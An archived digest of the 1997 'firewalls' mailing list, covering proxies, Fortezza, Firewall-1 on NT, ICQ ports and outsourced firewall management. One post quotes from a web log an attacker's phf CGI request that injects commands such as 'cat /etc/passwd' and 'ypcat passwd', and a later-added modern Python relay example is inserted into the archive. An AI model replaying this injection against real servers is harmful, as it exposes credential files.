In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

> No, no, no, what *I* want and what about 10^7 other sites want is this...
>
> client A                          server C
>              W   firewall         server D
> client B                          server F
>                                   server G
>                                   server H
>                                   server I
>                                   server K

there are 2 Solutions (if we are talking about WWW)

a) use different Ports
   W:80   -> C:80
   W:8080 -> D:80
   W:8081 -> E:80

b) use the Host Command from HTTP which no browser nor server supports yet :)

To get back on it, it's not a problem of software, but of design. There is no way a Server can tell what the host part of an URL was other than looking at the connected address:port Combination. If you have only one valid address you can run only one server at a given port.

Greetings
Bernd

-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)  If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Thu Jun 5 02:46:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA27268 for firewalls-outgoing; Wed, 4 Jun 1997 13:58:00 -0700 (PDT) Received: from relay1.shore.net ([192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18207 for ; Wed, 4 Jun 1997 13:11:13 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id QAA18326 for ; Wed, 4 Jun 1997 16:14:20 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 16:13:10 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: Fortezza's Fate?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Anyone out there watching Fortezza's Doom unfold? Fortezza was the US DoD's crypto (PCMCIA only?)
smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for a while, heavily promoted to the civilian US government agencies, as well as to industry.

Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies.

I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies.

There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!?

I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.)

Suerte,
_Vin

"Cryptography is like literacy in the Dark Ages. Infinitely potent, for good and ill... yet basically an intellectual construct, an idea, which by its nature will resist efforts to restrict it to bureaucrats and others who deem only themselves worthy of such Privilege." _ A thinking man's Creed for Crypto/ vbm.
* Vin McLellan + The Privacy Guild + *
53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

From owner-firewalls-outgoing Thu Jun 5 02:53:28 1997
Message-ID: <3395E581.22635C3A@physik.uni-muenchen.de>
Date: Thu, 05 Jun 1997 00:00:33 +0200
From: Hans Aschauer
To: firewalls@GreatCircle.COM
Subject: Transparent Proxies for Linux

Hi all,

I thought that the transparent proxy option in the Linux kernel looks quite interesting, but up to now I only found an http- and a vdo-proxy at ftp://ftp.ris.fr/pub/linux/proxy (can anyone help me with what a vdo-proxy is?)

Do you know of other proxies which can be used in a transparent mode (with Linux) and which are free? Are there perhaps patches for other proxy products?

TIA,
Hans.
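Hans's question above and Bernd's earlier reply on plug-gw come down to the same mechanism: a relay can only tell which server the client wanted from the address:port the connection arrived on, either an explicit port per backend on the firewall's own address or, in transparent mode, the original destination the kernel hands back. As an added example that is not code from the thread or from fwtk's plug-gw, here is a minimal Python relay with that policy check; FIREWALL_IP, the address tables and the getsockname() behaviour noted in the comments are assumptions.

```python
"""Minimal transparent TCP plug relay (added example, not fwtk's plug-gw)."""
import socket
import threading

# Constructed sample addresses: W is the firewall's single client-side address.
FIREWALL_IP = "192.0.2.1"

# Bernd's option (a): one listening port per backend on the firewall address.
PORT_MAP = {
    (FIREWALL_IP, 80):   ("10.0.0.3", 80),   # W:80   -> C:80
    (FIREWALL_IP, 8080): ("10.0.0.4", 80),   # W:8080 -> D:80
    (FIREWALL_IP, 8081): ("10.0.0.5", 80),   # W:8081 -> E:80
}

# Transparent mode: the kernel redirected the client's connection to us, so
# the original destination is whatever the client dialled. Plug only to the
# destinations an administrator listed (constructed allow-list), so a redirect
# to an unlisted host is refused instead of relayed blindly.
TRANSPARENT_ALLOW = {("10.0.0.6", 25), ("10.0.0.7", 119)}


def resolve_target(local_ip, local_port, port_map=PORT_MAP,
                   allow=TRANSPARENT_ALLOW):
    """Decide where to plug a connection that arrived at local_ip:local_port.
    Returns (ip, port), or None when policy refuses the connection."""
    key = (local_ip, local_port)
    if key in port_map:          # explicit per-port mapping wins
        return port_map[key]
    if key in allow:             # transparent: honour the original destination
        return key
    return None


def original_destination(conn):
    """Assumption: Linux 2.0/2.2-style transparent proxying, where
    getsockname() on the accepted socket yields the address the client
    dialled rather than the proxy's own (current netfilter REDIRECT needs the
    SO_ORIGINAL_DST getsockopt instead)."""
    ip, port = conn.getsockname()[:2]
    return ip, port


def pump(src, dst):
    """Copy bytes one way until EOF, then half-close the other side."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def plug(conn, peer):
    """Handle one accepted connection: policy check, then bidirectional relay."""
    ip, port = original_destination(conn)
    target = resolve_target(ip, port)
    if target is None:
        print("refused %s:%d -> %s:%d" % (peer[0], peer[1], ip, port))
        conn.close()
        return
    print("plug %s:%d -> %s:%d" % (peer[0], peer[1], target[0], target[1]))
    upstream = socket.create_connection(target, timeout=30)
    upstream.settimeout(None)
    threading.Thread(target=pump, args=(conn, upstream), daemon=True).start()
    pump(upstream, conn)
    upstream.close()
    conn.close()


def serve(bind_addr, bind_port):
    """Accept loop; the kernel's redirect rules (not shown) steer traffic here."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((bind_addr, bind_port))
    lsock.listen(64)
    while True:
        conn, peer = lsock.accept()
        threading.Thread(target=plug, args=(conn, peer), daemon=True).start()


if __name__ == "__main__":
    serve("0.0.0.0", 8080)
```

Redirecting client connections to the relay is done with the kernel's own rules (ipfwadm/ipchains on the kernels of the day) and is not shown here.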
From owner-firewalls-outgoing Thu Jun 5 02:54:57 1997
Date: Wed, 4 Jun 1997 19:01:30 -0400 (EDT)
From: "John \"E.R.\" Jasen"
To: Rabid Wombat
cc: Jyri Kaljundi , Firewalls@GreatCircle.COM
Subject: Re: Security Crazy

> On Sun, 1 Jun 1997, Jyri Kaljundi wrote:
> > Sat, 31 May 1997, Marcus J. Ranum wrote:
> > > > >> my CEO has gone security crazy [...] win95
> > >
> > > He's a bit unclear on the concept, isn't he?
> >
> > I am pretty sure there actually are good commercial systems available to
> > make large number of win95 machines much more secure than as they are
> > out-of-box.

Not that this pertains to firewalls, but if he's using MicroSoft and security in the same sentence, then he really should look at NT.

-- 
"What do you want?" -- Mr. Morden, Microsoft Sales VP
-- John E. Jasen // Systems Alchemist \\ jjasen1@umbc.edu --
-- My views are not those of UMBC, AFAIK. HTH. HAND.
--

From owner-firewalls-outgoing Thu Jun 5 03:36:18 1997
Subject: Re: firewall setup
Date: 04 Jun 1997 17:43:44 -0400
In-Reply-To: "Sameer R. Manek"'s message of Wed, 4 Jun 1997 10:14:45 -0700 (PDT)
To: "Sameer R. Manek"
From: Douglas McNaught
Cc: firewalls@GreatCircle.COM

"Sameer R. Manek" writes:

> The other day someone drew an ASCII map of how the network should be set up.
> It looked something like this
>
> ---> gateway -+-> firewall ---> internal net
>               |
>          mail server
>
> In this setup i don't really seem to understand the purpose of the
> gateway. here, my intro to tcp/ip protocols book defines a gateway as a
> device that translates between protocols.

Your book is, well, incomplete. 'Gateway' is often synonymous with 'router'. Here, I think they're talking about the IP router that connects you to the Internet.

Also, that diagram seems to indicate that your mail server lives outside the firewall. I would not do this, since it makes the mail machine vulnerable to SMTP attacks. Proxy SMTP at the firewall and keep the mail server inside.
-Doug

-- 
sub g{my$i=index$t,$_[0];($i%5,int$i/5)}sub h{substr$t,5*$_[1]+$_[0],1}sub n{(
$_[0]+4)%5}$t='encryptabdfghjklmoqsuvwxz';$c='fxmdwbcmagnyubnyquohyhny';while(
$c=~s/(.)(.)//){($w,$x)=g$1;($y,$z)=g$2;$w==$y&&($p.=h($w,n$x).h($y,n$z))or$x==
$z&&($p.=h(n$w,$x).h(n$y,$z))or($p.=h($y,$x).h($w,$z))}$p=~y/x/ /;print$p,"\n";

From owner-firewalls-outgoing Thu Jun 5 03:46:11 1997
Date: Thu, 5 Jun 1997 11:00:55 +0200 (MET DST)
From: Margarida Oliveira - Paco
To: Petr Snajdr , firewalls@GreatCircle.COM
Subject: ssh client for Macintosh (System 7.6.1)

Hi.

Does anyone know of a ssh client for Macintosh?

Thanks in advance.
Margarida.
===================================================
Margarida Oliveira  : Phone: +351-53-601159
University of Minho : mailto:mo@ci.uminho.pt
Braga - Portugal    : http://www.uminho.pt

From owner-firewalls-outgoing Thu Jun 5 04:00:44 1997
Message-ID: <33968FAE.61AAD4B2@pvt.net>
Date: Thu, 05 Jun 1997 12:06:38 +0200
From: Petr Snajdr
To: Margarida Oliveira - Paco
CC: firewalls@GreatCircle.COM
Subject: Re: ssh client for Macintosh (System 7.6.1)

Margarida Oliveira - Paco wrote:
>
> Hi.
>
> Does anyone know of a ssh client for Macintosh?

F-Secure SSH for the Macintosh 30 Day Trial Version

To run the client on your machine you need: System 7.0 or later, 68020 or better, 3 megabytes free RAM, 2 megabytes free disk space, MacTCP or Open Transport.
http://www.datafellows.com/f-secure/ssh/mac/

Other F-Secure SSH Clients (Windows/Unix): http://www.datafellows.com/f-secure/fclintp.htm

Petr Snajdr

From owner-firewalls-outgoing Thu Jun 5 05:31:11 1997
Date: Thu, 5 Jun 1997 15:08:46 +0300 (EET DST)
From: Jyri Kaljundi
To: Daniel Strawson
cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

On Wed, 4 Jun 1997, Daniel Strawson wrote:

> We tried it and, yes we managed to crash an NT based Firewall-1 system.
> This is odd since (if memory serves) the packets should be dropped on the
> floor by the stateful inspection module.

You mean you can crash an NT FW-1 by sending OOB data to it?! That's scary if it is true and should be addressed by Check Point ASAP!

What I have always thought of FW-1 is that it operates at quite low level inside the OS kernel, that as long as you filter everything the network bugs in the OS don't really matter, as the packets never reach FW-1.

If sending some bytes of data to FW1 crashes it and the OS, this combination (FW1+NT) should not be used as a firewall solution at all. Maybe someone from CP could explain how much the bugs in the OS matter once FW1 is installed.
Jüri

From owner-firewalls-outgoing Thu Jun 5 07:31:40 1997
Message-ID: <01BC71C6.F91382C0@MS254.isis.co.za>
From: Pat Verner
To: "'firewalls@greatcircle.com'"
Subject: ICQ and udp port 4000
Date: Thu, 5 Jun 1997 15:41:42 +-200

I have just had a request to open port 4000 for outgoing UDP in order to support a product called ICQ. I must confess to being loath to open unnecessary udp ports, but don't want to let prejudice influence me unduly..

Does anyone know anything about this product, and what the security implications would be in opening the port? Any comments would be appreciated.

There is a blurb about ICQ on http://www.mirabilis.com/

Thanks in anticipation ..
=Pat

From owner-firewalls-outgoing Thu Jun 5 07:43:18 1997
Date: Thu, 5 Jun 1997 14:24:39 +0100 (BST)
From: Daniel Strawson
To: Jyri Kaljundi
cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

Hang on a moment. Let me put this in perspective.

As I understand it, this problem results from sending packets with a particular IP option set in the header. (Please confirm I'm right here someone). Firewall _SHOULD_ drop all packets with IP options set. This would mean that all Firewall-1 systems and systems behind Firewall-1 are impervious to this attack. (something for Checkpoint to be proud of).

Unfortunately this is not the case - as I say I've managed to get NT to crash with FW-1 installed. Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to crash, you get the NT system that it is running on to crash, so it is not an insecurity, but a claimed feature that doesn't work.

So, either -

- The IP Options drop code in FW-1 doesn't work.

or

- I do not properly understand this attack and it does not work as I imagine - in this case, please correct me.
Cheers,
Daniel

On Thu, 5 Jun 1997, Jyri Kaljundi wrote:

> On Wed, 4 Jun 1997, Daniel Strawson wrote:
>
> > We tried it and, yes we managed to crash an NT based Firewall-1 system.
> > This is odd since (if memory serves) the packets should be dropped on the
> > floor by the stateful inspection module.
>
> You mean you can crash an NT FW-1 by sending OOB data to it?!
> That's scary if it is true and should be addressed by Check Point ASAP!
>
> What I have always thought of FW-1 is that it operates at quite low level
> inside the OS kernel, that as long as you filter everything the network
> bugs in the OS don't really matter, as the packets never reach FW-1.
>
> If sending some bytes of data to FW1 crashes it and the OS, this
> combination (FW1+NT) should not be used as a firewall solution at all. May
> be someone from CP could explain, how much do the bugs in the OS matter
> once FW1 is installed.
>
> Jüri
>
>

From owner-firewalls-outgoing Thu Jun 5 07:47:03 1997
From: "Paquette, Trevor"
To: "'John Kemker'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: ISP Connection
Date: Thu, 5 Jun 1997 07:35:21 -0600

The decision is up to the individual company.
With proper communication and feedback, there is no reason why you cannot trust another organization to run your firewall for you.

Do you trust your mechanic to run and fix your car? For most of the people out there the answer is yes. Some people do it themselves. (Some people also fail miserably at doing it themselves, and likewise some mechanics are just as bad.) But when you find the right one.. you keep your business relationship with them. You trust them to keep your car safe and in running condition whenever you need it.

I know that analogy is stretching it, but it does come close to the relationship that you can have with the right ISP and Firewall service administrator.

> -----Original Message-----
> From: John Kemker [SMTP:john.kemker@pfsfhq.com]
> Sent: Wednesday, June 04, 1997 1:09 PM
> To: firewalls@GreatCircle.COM
> Subject: Re: ISP Connection
>
> Handing over your firewall administration to another organization is not,
> in my personal opinion, a wise move. You are saying, in effect, that you
> implicitly trust that organization to always think and act in your
> organization's best interest. This is not realistic.
>
> "Only those defenses are good, certain and durable, which depend on
> yourself alone and your own ability." _The_Prince_ --N. Machiavelli
>
> Administer your firewall yourself. Put it up yourself, define the policies
> yourself and maintain it yourself.
>
> =========== REPLY PARTITION ===========
>
> On 06/04/97, at 12:01 PM, Mariko Yashada wrote:
> >
> >
> >Here is a related question:
> >
> >There is another local ISP who will connect us at T1 and install a firewall
> >at our location. They will then administer the firewall remotely from their
> >location. They support three different firewalls, Gauntlet, Firewall-1 and
> >Borderware. The advantage is the savings in admin costs. Has anyone had
> >any experience with this type of arrangement?
> >We have also talked to BBN about
> >their Site Patrol product, which is a remotely managed Gauntlet.
> >
> >Thanks,
> >
> >Mariko
>
> John E. Kemker III
> Systems Engineer, Primerica Financial Services
> 3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Thu Jun 5 08:16:41 1997
Message-Id: <199706051346.JAA02854@hogpb.ho.att.com>
Date: Thu, 5 Jun 1997 09:46:02 -0400
To: Jyri Kaljundi
From: "Bryan D. Boyle"
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Cc: firewalls@greatcircle.com

At 03:08 PM 6/5/97 +0300, you wrote:

>You mean you can crash an NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!
>

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.
>What I have always thought of FW-1 is that it operates at quite low level
>inside the OS kernel, that as long as you filter everything the network
>bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>
>If sending some bytes of data to FW1 crashes it and the OS, this
>combination (FW1+NT) should not be used as a firewall solution at all. May
>be someone from CP could explain, how much do the bugs in the OS matter
>once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

-- 
Bryan D. Boyle          | LOGICAL: bdboyle@att.com 201-386-8584
#include                | VIRTUAL: http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ
                        | HISTORICAL: HQ, 6th Battalion, Army of No. VA.

"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?"
-Thomas Jefferson, 1787

From owner-firewalls-outgoing Thu Jun 5 08:22:46 1997
Message-Id: <199706051407.HAA20909@honor.greatcircle.com>
From: Stan Wnuck
Subject: psswd HACK
To: firewalls@GreatCircle.COM
Date: Thu, 5 Jun 97 10:10:54 EDT

Hello again,

Thanks to all of the responses that I have received on this. One more question.... exactly how did they get my passwd file?

I typed in the URL from my log file into my browser....

http://myserver.somwhere.com/cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0

and I got this in return in my browser....

Query Results

/usr/local/bin/ph -m -s ns.uiuc.edu\
cat /etc/passwd\
ypcat passwd\
pwd\
id\
uname -a\
name=foo

Where is the passwd file?

OK! Let's say that they did get my passwd file..... How much damage can they do if I have a firewall in place that my web server sits behind? The only services available from this host to the Internet are http, dns, and smtp. So services like ftp and telnet would be denied if they tried. Is there something I am missing?

Thanks again,

Stan Wnuck                                swnuck@unixpros.com
Unixpros, Inc.
10 Industrial Way East                    (908) 389-3295 x542
Eatontown, NJ 07724                       (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ                (908) 427-2033 / 427-6963

From owner-firewalls-outgoing Thu Jun 5 08:57:33 1997
Message-Id: <3.0.32.19970605065915.00a1b700@mx2.netfrontier.com>
To: Vin McLellan , firewalls@greatcircle.com
From: pcoppinger@appsware.com (Paul Coppinger)
Subject: Re: Fortezza's Fate??
Date: Thu, 5 Jun 1997 06:46:03 -0700

At 04:13 PM 6/4/97 -0500, Vin McLellan wrote:

> There are a lot of rumors buzzing around DC these days to the
>effect that NSA and the Joint Chiefs have tossed in the towel and will,
>within weeks, approve DoD purchases for non-Fortezza security systems, for
>both strong authentication, and (I presume) more standard PKI. I
>understand they have been briefing US.gov security staff and the
>contractors who have been working on Fortezza apps.

I'm, of course, interested in your sources of this information, however I'm more interested in learning what kinds of security systems they intend to use in place of Fortezza. I just can't see protecting classified information using *only* a software token...

> I also understand that DoD is considering approving Fortezza in
>software applications?!?

Are you suggesting that the Skipjack algorithm is about to be published?
:)

Paul Coppinger
APPS Software International
4417 North Saddlebag Trail, Suite 1
Tel: 602.947-2227
Fax: 602.947-2280
"THE AUTOMATION BRIDGE"

From owner-firewalls-outgoing Thu Jun 5 09:12:25 1997
Message-Id: <3396B74D.333@coop.crn.org>
Date: Thu, 05 Jun 1997 07:55:42 -0500
From: Joe Doetzl
Reply-To: doetzl@coop.crn.org
To: firewalls@greatcircle.com
Subject: NNTP server in DMZ?

I have a customer who wishes to install a NNTP server. It is likely that they will host internal newsgroups that will need to be protected. The internal network is in the address range reserved for private internetworks. They are using SOCKS for access from the internal network to the Internet. Traffic to the DMZ is limited to ftp, http, dns, smtp and ntp.

With that in mind is it possible to put the NNTP server on the inside and still get a feed from an upstream provider? This solution would eliminate the need for SOCKSified nntp clients. Or should the NNTP server be placed in the DMZ with a registered IP and FQDN and the clients access it via SOCKS? I have a hunch that perhaps NAT would provide an even better solution?
Thank you,
--Joe

From owner-firewalls-outgoing Thu Jun 5 09:38:09 1997
Message-Id: <97Jun5.080502cdt.36891-2@igate.panenergy.com>
Date: Thu, 5 Jun 1997 08:06:32 -0500
To: firewalls@GreatCircle.COM
From: Robert Laird
Subject: client can't reach port 82

First, I'm not a firewall expert (which is why I read this list!), and only know some basics.

Someone came to me and asked why they couldn't reach a Lotus Corp Web site from within their company's firewall, but could easily get to it from their home PC via ISP. I looked at the site and it's using port 82. My guess was that their firewall was set up to block any incoming data from non-standard (port 80) ports. Is this right?
-- Robert
---------------------------------------
Robert Laird *** Houston, Texas
Quadrant Computer Systems
mailto:rlaird@concentric.net
mailto:70070.460@compuserve.com
mailto:rlaird@panenergy.com
Home Page: http://www.concentric.net/~rlaird/
Day phone: 713-260-6586
---------------------------------------------

From owner-firewalls-outgoing Thu Jun 5 09:46:09 1997
Message-ID: <01BC7195.8A687AA0@xxxaaa>
From: Matt Eide
To: "'firewalls@GreatCircle.COM'"
Subject: RE: PIX and Firewall-1
Date: Thu, 5 Jun 1997 09:47:47 -0500

Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall.

(From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.
I would like to add that Firewall-1 can be set to continue monitoring all the packets of an established session and will check them against the rule base.

Later,
Matt
Meide@sybronint.com

From owner-firewalls-outgoing Thu Jun 5 10:02:22 1997
Message-ID: <3396CD7E.71C4@hypercon.com>
Date: Thu, 05 Jun 1997 09:30:22 -0500
From: msquared
Reply-To: msquared@hypercon.com
To: jlowder@mustang.usafa.af.mil
CC: firewalls@greatcircle.com
Subject: RAPTOR WEBNOT

On Thu, 5 Jun 97 6:09:32 GMT, msquared@hypercon.com wrote:

>Lt. have you tried contacting Microsystems directly -
>http://www.microsys.com? I suspect you will get a more immediate
>response to your problem if you do.

Thanks, Mike. That's exactly what I've been doing. BTW, I sent that e-mail to the Raptor list several months ago... Any idea why I'm getting responses all of a sudden?

No explanation for the recent Raptor interest. I did notice Alan Rogers from Raptor is involved. When I worked with Raptor, he seemed to be someone who could get things done. I suspect all the recent mail on this list is part of the reason.
If I were a vendor I would be concerned if the public was getting the perception my product didn't function properly.

I suggest we take this offline from this point since this really isn't a firewall related security issue and probably not of interest to most of the list.

Mike

From owner-firewalls-outgoing Thu Jun 5 10:30:45 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16374 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT)
Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16351 for ; Thu, 5 Jun 1997 05:46:58 -0700 (PDT)
Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id QAA02637; Thu, 5 Jun 1997 16:50:41 +0400
From: ArkanoiD
Message-Id: <199706051250.QAA02637@paranoid.convey.ru>
Subject: Re: Plug-gw- One to many relationship
To: hagan@cih.com
Date: Thu, 5 Jun 1997 16:50:41 +0400 (MSD)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Craig I. Hagan" at Jun 4, 97 01:36:29 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

nuqneH,

> > You want both clients to be able to plug to either server. To accomplish
> > this, assign two addresses to the firewall on the client side and two
> > addresses to the firewall on the server side so that you have:
>
> heck, why not make it a transparent proxy? i've done that already
> (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches).
> the advantage there is that you don't have to have 8 batrillion entries,
> permit what you want and let plug-gw figure out the destination host from
> 'its' ip address as is given by the OS. I'll admit that i've only done
> this with linux, but, as many have said, solaris and other OSes should
> work, too.
Hmm, haven't tried those, but the ipfilter distribution (BSD systems) includes similar ones for the ipfilter package.

--
CU in Hell  /Arkan#iD
Do I believe in Bible? Hell, man, I've seen one!

From owner-firewalls-outgoing Thu Jun 5 10:39:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA14810 for firewalls-outgoing; Thu, 5 Jun 1997 05:19:52 -0700 (PDT)
Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA14781 for ; Thu, 5 Jun 1997 05:19:36 -0700 (PDT)
Message-Id: <199706051219.FAA14781@honor.greatcircle.com>
Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A093C1300DA; Thu Jun 05 08:26:59 1997
From: "Steve Rudolph"
To: "David Harvey-George" ,
Subject: Re: FW-1 and IP Forwarding on NT Box
Date: Thu, 5 Jun 1997 08:26:39 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1161
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

David and group....

I have already got this running. Thank you to all who responded to my inquiry. I have learned a lot just from the replies. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machine's network.

Now I just need to crack the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise called MCI Webmaker. This was a combination port filter router and proxy server. As it turns out Intel programmed the software (proxy) and configured the router. Vanstar installed the OS (NT), and none of the above are able to get me the router password.
Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ).

I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a PC card) in terminal mode within 60 seconds, and then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of DOS 5.0 or an old hard drive anywhere with a DOS-based terminal program.

This whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though.

Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call.

Thanks again

Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com
http://www.rude-dog.com
http://www.rust.net/~stever
stever@rust.net

----------
> From: David Harvey-George
> To: Steve Rudolph ; firewalls@greatcircle.com
> Subject: Re: FW-1 and IP Forwarding on NT Box
> Date: Wednesday, June 04, 1997 7:14 PM
>
> > I followed all of microsoft's recommendations.
>
> Possibly a bad move.
>
> > Two nic cards a and b
>
> Sounds like the start of a stand-up comedy routine
>
> > A is set with default gateway of b
> > and b is set with gateway of a
>
> it is!
>
> Okay, look, the system with the two cards knows how to route to each
> network. All you've gotta do is set up the default gateway for
> workstations on network A (NIC A) and the default gateway for workstations
> on network B (NIC B). Don't touch anything on the router if your network
> really is this simple (e.g. no other routes). If you have other routes
> then use the route command directly.
>
> > Workstations can ping a and b
> > Workstations cannot ping network b
> > Ip forwarding is enabled and my route print matches exactly the format of
> > microsofts recommendations.
> >
> > I really need to get this up and running.
> > I would get you the route print, but I cannot get the addresses to copy
> > onto the clip board..duh :)
>
> Yeah, I think you better send us the output from netstat on both the
> 'router' and the workstations.
>
> Run netstat -rn from a DoZ window, click on the little Doz icon at the left
> of the title bar, select edit/mark, mark the stuff you want to send, copy
> it and paste it.
>
> David

From owner-firewalls-outgoing Thu Jun 5 10:54:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA22520 for firewalls-outgoing; Thu, 5 Jun 1997 07:37:30 -0700 (PDT)
Received: from cerberus2.fon.sprintcorp.com (cerberus2.fon.sprintcorp.com [204.215.0.61]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA22376 for ; Thu, 5 Jun 1997 07:35:06 -0700 (PDT)
From: BLeBlanc@igate.sprint.com
Received: by cerberus2.fon.sprintcorp.com; id JAA04475; Thu, 5 Jun 1997 09:38:49 -0500 (CDT)
Received: from fonkc28.fon.sprintcorp.com(144.223.19.54) by cerberus2.fon.sprintcorp.com via smap (3.2) id xma004469; Thu, 5 Jun 97 09:38:47 -0500
Received: FROM FONIMAIL.fonkc28.fon.sprintcorp.com BY fonkc28.fon.sprintcorp.com ; 5 JUN 97 09:39:10 CDT
Date: 5 JUN 97 09:36:55 CDT
Subject: RE: ISP Connection
To: firewalls@greatcircle.com
Message-ID: <0007wwcaiamc.H000012201eadb69@igate.sprint.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Having a third party perform the administrative functions must be determined by weighing many factors. You need to decide:

"Which security technology is best for my environment?" (based on your security policy - what type(s) of security need to be deployed? Firewall? Strong Authentication? Encryption? and what/who are you trying to secure?)

"Who are the respected and reliable vendors in the market?" (this must include the third party that you are considering doing the management, as well as the vendor/manufacturer of the security products themselves).
Obviously, monetary cost factors come into play. Whether you buy the hardware/os/software and manage the components in-house -vs- you out-source these to a third party and pay month-to-month.

Do you have the staff to manage the firewall in-house? (A firewall is NOT a collateral duty to be assigned to a data center's staff that has no background in firewalls).

